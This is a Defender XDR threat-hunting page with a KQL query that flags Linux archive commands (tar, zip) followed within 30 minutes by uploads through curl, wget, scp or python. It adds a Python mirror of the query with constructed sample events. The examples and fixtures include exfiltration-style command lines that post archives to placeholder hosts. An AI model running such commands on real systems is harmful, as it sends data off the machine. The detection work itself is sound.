Linux Archive Command Followed By Upload Egress

Query

## Linux – Archive Command Followed by Upload Egress – Last 24h

### Query name

**`Linux – Archive command followed by upload egress – last 24h`**

---

## Why this hunt works on Linux

On Linux systems:

* Archive creation often occurs in memory‑backed locations (for example `/tmp`)
* File telemetry is not guaranteed for all filesystems or mount types
* Exfiltration is frequently performed by a *different process* than the one that created the archive

As a result, correlating **process execution + network egress within a time window** is significantly more reliable than attempting a strict file‑event join.

---

## Query

```kql
// Update DeviceName and time window as required
let Device = "DeviceNameHere";
let ArchiveProc =
    DeviceProcessEvents
    | where Timestamp > ago(24h)
    | where DeviceName =~ Device
    | where FileName in ("tar","zip","gzip")
    | where ProcessCommandLine has_any (".zip", ".tgz", ".tar", "tar -c", "tar -cz", "zip ")
    | project
        DeviceId,
        DeviceName,
        ArchiveTime = Timestamp,
        ArchiveProc = FileName,
        ArchiveCmd = ProcessCommandLine,
        AccountName;
let UploadEgress =
    DeviceNetworkEvents
    | where Timestamp > ago(24h)
    | where DeviceName =~ Device
    | where RemoteIP !startswith "127."
    | where RemoteIPType == "Public" or isempty(RemoteIPType)
    | where InitiatingProcessFileName in ("curl","wget","python","python3","openssl","scp","sftp")
    | project
        DeviceId,
        NetTime = Timestamp,
        NetProc = InitiatingProcessFileName,
        NetCmd = InitiatingProcessCommandLine,
        RemoteIP,
        RemotePort;
ArchiveProc
| join kind=inner (UploadEgress) on DeviceId
| where NetTime between (ArchiveTime .. ArchiveTime + 30m)
| project
    ArchiveTime,
    NetTime,
    DeviceName,
    AccountName,
    ArchiveProc,
    ArchiveCmd,
    NetProc,
    NetCmd,
    RemoteIP,
    RemotePort
| order by ArchiveTime desc
```

---

## What this query surfaces

This hunt will surface behaviour such as:

* Creation of archives immediately prior to outbound uploads
* Data exfiltration using common Linux utilities (`curl`, `scp`, `python`)
* Red team and EDR test activity
* Manual attacker workflows where tooling is chained together

Examples include:

* `tar -czf data.tgz data/` followed by `curl -F "file=@data.tgz" https://…`
* `zip staging.zip *` followed by `scp staging.zip user@remote:/tmp/`

---

## Why this avoids common false negatives

This approach intentionally avoids:

* Dependence on `DeviceFileEvents`
* Assumptions about filesystem visibility
* Assumptions that the same process performs both actions

As a result, it reliably catches activity that Defender XDR alerts on but which simpler hunts often miss.

Explanation

This query is designed to detect suspicious activity on Linux systems by identifying instances where files are archived and then uploaded to an external location within a short time frame. Here's a simplified breakdown:

1. **Purpose:** The query aims to find cases where a file is archived (compressed) and then quickly uploaded to an external server, which might indicate data exfiltration or unauthorized data transfer.

2. **How it works:**
    * It looks at process events to find when archive commands (`tar`, `zip`, `gzip`) are executed on a specified device within the last 24 hours.
    * It also examines network events to identify outbound connections made by processes like `curl`, `wget`, `scp`, etc., which are common for uploading files.
    * The query then correlates these two activities (archiving and uploading) if they occur on the same device and within 30 minutes of each other.

3. **What it surfaces:**
    * Instances where files are archived and then uploaded, potentially indicating data exfiltration.
    * Use of common Linux tools for uploading files, which might be used by attackers or during security tests.
    * Manual or automated workflows that involve creating an archive and then transferring it out of the system.

4. **Why it's effective:**
    * It doesn't rely on file system events, which might not be available or reliable on all systems.
    * It doesn't assume that the same process performs both archiving and uploading, which is a common tactic to evade detection.
    * By focusing on process execution and network activity, it captures a broader range of suspicious behaviors that simpler methods might miss.
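The correlation the query performs (filter archive processes, filter public-bound uploads, join on `DeviceId`, keep pairs inside a 30-minute window) is easy to misjudge without data to run it against. The following is an added example, not part of the original hunt page or its KQL: a stand-alone Python re-implementation of the same logic over constructed sample events, so the window join and each filter can be checked offline before the hunt is trusted. It assumes events are dicts keyed by the Defender column names the KQL references; every timestamp, device, account, IP and command line below is constructed.

```python
# Added example (not the hunt page's own code): Python mirror of the KQL correlation.
# Assumption: each event is a dict using the Defender column names the query references.
from datetime import datetime, timedelta, timezone

ARCHIVE_PROCS = {"tar", "zip", "gzip"}                                   # FileName in (...)
ARCHIVE_TERMS = (".zip", ".tgz", ".tar", "tar -c", "tar -cz", "zip ")    # has_any (...)
UPLOAD_PROCS = {"curl", "wget", "python", "python3", "openssl", "scp", "sftp"}
LOOKBACK = timedelta(hours=24)                                           # ago(24h)
WINDOW = timedelta(minutes=30)                                           # ArchiveTime .. ArchiveTime + 30m
UTC = timezone.utc


def is_archive_event(ev):
    """DeviceProcessEvents filter: archive binary plus an archive-looking command line.
    KQL has_any is case-insensitive, so compare lower-cased substrings."""
    cmd = ev["ProcessCommandLine"].lower()
    return ev["FileName"] in ARCHIVE_PROCS and any(t in cmd for t in ARCHIVE_TERMS)


def is_upload_egress(ev):
    """DeviceNetworkEvents filter: not loopback, Public (or untyped) destination,
    initiated by an upload-capable binary. An empty RemoteIPType is passed through
    exactly as the KQL's isempty() does; note this is permissive, untyped != public."""
    if ev["RemoteIP"].startswith("127."):
        return False
    if ev.get("RemoteIPType", "") not in ("Public", ""):
        return False
    return ev["InitiatingProcessFileName"] in UPLOAD_PROCS


def correlate(process_events, network_events, device, now, window=WINDOW):
    """Inner join on DeviceId, keeping egress that lands in [ArchiveTime, ArchiveTime+window]."""
    since = now - LOOKBACK
    in_scope = lambda e: e["Timestamp"] > since and e["DeviceName"].lower() == device.lower()  # =~
    archives = [e for e in process_events if in_scope(e) and is_archive_event(e)]
    egress = [e for e in network_events if in_scope(e) and is_upload_egress(e)]
    hits = []
    for a in archives:
        for n in egress:
            if a["DeviceId"] != n["DeviceId"]:
                continue
            if not (a["Timestamp"] <= n["Timestamp"] <= a["Timestamp"] + window):  # between is inclusive
                continue
            hits.append({
                "ArchiveTime": a["Timestamp"], "NetTime": n["Timestamp"],
                "DeviceName": a["DeviceName"], "AccountName": a["AccountName"],
                "ArchiveProc": a["FileName"], "ArchiveCmd": a["ProcessCommandLine"],
                "NetProc": n["InitiatingProcessFileName"], "NetCmd": n["InitiatingProcessCommandLine"],
                "RemoteIP": n["RemoteIP"], "RemotePort": n["RemotePort"],
            })
    hits.sort(key=lambda h: h["ArchiveTime"], reverse=True)  # order by ArchiveTime desc (stable sort)
    return hits


def _ts(h, m, s=0):
    return datetime(2026, 2, 2, h, m, s, tzinfo=UTC)


NOW = _ts(12, 0)
# Constructed DeviceProcessEvents rows (sample data, not real telemetry)
PROCESS_EVENTS = [
    {"Timestamp": _ts(8, 0), "DeviceId": "dev-1", "DeviceName": "srv-01", "FileName": "zip",
     "ProcessCommandLine": "zip staging.zip *", "AccountName": "bob"},
    {"Timestamp": _ts(10, 0), "DeviceId": "dev-1", "DeviceName": "srv-01", "FileName": "tar",
     "ProcessCommandLine": "tar -czf data.tgz data/", "AccountName": "alice"},
    {"Timestamp": _ts(10, 1), "DeviceId": "dev-1", "DeviceName": "srv-01", "FileName": "ls",
     "ProcessCommandLine": "ls -la /tmp", "AccountName": "alice"},          # not an archive tool
    {"Timestamp": _ts(10, 2), "DeviceId": "dev-2", "DeviceName": "srv-02", "FileName": "tar",
     "ProcessCommandLine": "tar -cf backup.tar /etc", "AccountName": "root"},  # other device
]
# Constructed DeviceNetworkEvents rows (sample data, not real telemetry)
NETWORK_EVENTS = [
    # 40 s after the tar, by a different process: the pair the hunt is built to find
    {"Timestamp": _ts(10, 0, 40), "DeviceId": "dev-1", "DeviceName": "srv-01",
     "InitiatingProcessFileName": "curl",
     "InitiatingProcessCommandLine": "curl -F file=@data.tgz https://upload.example.invalid/",
     "RemoteIP": "203.0.113.10", "RemoteIPType": "Public", "RemotePort": 443},
    # private destination: dropped by the RemoteIPType filter even though it follows the zip
    {"Timestamp": _ts(8, 5), "DeviceId": "dev-1", "DeviceName": "srv-01",
     "InitiatingProcessFileName": "scp",
     "InitiatingProcessCommandLine": "scp staging.zip user@10.0.0.5:/tmp/",
     "RemoteIP": "10.0.0.5", "RemoteIPType": "Private", "RemotePort": 22},
    # loopback: dropped by !startswith "127."
    {"Timestamp": _ts(10, 5), "DeviceId": "dev-1", "DeviceName": "srv-01",
     "InitiatingProcessFileName": "python3", "InitiatingProcessCommandLine": "python3 app.py",
     "RemoteIP": "127.0.0.1", "RemoteIPType": "Loopback", "RemotePort": 8000},
    # untyped destination 20 min after the tar: inside the window, passes isempty()
    {"Timestamp": _ts(10, 20), "DeviceId": "dev-1", "DeviceName": "srv-01",
     "InitiatingProcessFileName": "wget",
     "InitiatingProcessCommandLine": "wget --post-file=data.tgz http://198.51.100.7/",
     "RemoteIP": "198.51.100.7", "RemoteIPType": "", "RemotePort": 80},
    # public upload 90 min after the tar: outside the 30 min window
    {"Timestamp": _ts(11, 30), "DeviceId": "dev-1", "DeviceName": "srv-01",
     "InitiatingProcessFileName": "curl",
     "InitiatingProcessCommandLine": "curl -T data.tgz https://upload.example.invalid/",
     "RemoteIP": "203.0.113.10", "RemoteIPType": "Public", "RemotePort": 443},
]


def run_sample():
    # Device name given in a different case to exercise the =~ comparison
    return correlate(PROCESS_EVENTS, NETWORK_EVENTS, "SRV-01", NOW)


if __name__ == "__main__":
    for h in run_sample():
        print(f'{h["ArchiveTime"]:%H:%M:%S} {h["ArchiveCmd"]!r} -> '
              f'{h["NetTime"]:%H:%M:%S} {h["NetProc"]} {h["RemoteIP"]}:{h["RemotePort"]}')
```

Running it yields two rows, both anchored on the `tar -czf` at 10:00: the `curl` 40 seconds later and the untyped `wget` 20 minutes later. The `scp` to a private address, the loopback `python3` connection and the late `curl` are all dropped, which matches what the KQL would return on equivalent telemetry. Two points worth carrying back to the hunt: `has_any (".tar", ".tgz", …)` also matches extraction commands such as `tar -xzf`, and the `isempty(RemoteIPType)` branch admits destinations whose type the sensor could not classify, so both are tuning knobs rather than fixed truths.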

Details

Nathan Hutchinson

Released: February 2, 2026

Tables

DeviceProcessEvents, DeviceNetworkEvents

Keywords

Linux, Devices, Network, Process, Archive, Upload, Egress

Operators

let, where, in, has_any, project, join, kind=inner, between, order by, desc, ago, =~, !startswith, isempty